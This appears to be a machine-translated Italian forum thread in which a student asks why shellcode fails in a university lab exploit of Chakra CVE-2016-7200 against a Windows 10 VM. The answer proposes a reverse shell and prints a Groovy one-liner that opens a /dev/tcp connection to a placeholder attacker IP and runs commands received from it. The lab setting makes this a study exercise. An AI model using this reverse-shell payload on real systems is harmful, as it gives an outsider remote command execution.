Problema con shellcode durante lo sfruttamento di Chakra

0

Studio la sicurezza informatica all'università, e abbiamo ottenuto a scuola un progetto per utilizzare alcune vecchie vulnerabilità patchate per ottenere il controllo su PC. Abbiamo scelto l'exploit di Chakra CVE-2016-7200. Abbiamo a che fare con l'apertura di Motepad sul PC della vittima (una macchina virtuale con Windows 10 PRO x64 1607). Ma niente di più.

Abbiamo provato a utilizzare lo shellcode da qui ma non funziona. Dovrebbe scaricare ed eseguire il nostro virus dal server, ma non fa nulla. Abbiamo disattivato firewall, difensore ecc. E ancora niente. Inoltre abbiamo testato alcuni shellcode in VisualStudio (C / C ++) e quando avevamo uno shellcode funzionante (aprendo qualcos'altro rispetto a Notepad, come calc.exec) ma quando lo abbiamo messo fuori JS non ha fatto nulla (sì, lo abbiamo cambiato in formato % u ...).

Se hai qualche idea su cosa potrebbe essere sbagliato, o se hai qualche suggerimento per favore fammelo sapere.

    
posta user175989 18.04.2018 - 00:33
fonte

1 risposta

0

L'uso di codice sconosciuto è sempre rischioso. Il backpatching e il resto interromperanno molte cose che non ti aspetti. Spesso i dispositivi con versioni precedenti del software sono stati effettivamente copiati, ma non c'è modo di sapere altro che leggere i log delle modifiche e le versioni.

Detto questo, prova a creare una shell java inversa sul server (dovrai dare il via ad un ascoltatore). Se riesci a ottenere un buon guscio avrai molta più fortuna a scrivere lo script per chiamare te stesso il virus. Onestamente, nel punto in cui hai una shell con i privilegi, puoi probabilmente chiamare questa sfida completata.

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Se non hai trovato questa pagina, potrebbe essere utile: link

    
risposta data 18.04.2018 - 17:34
fonte

Leggi altre domande sui tag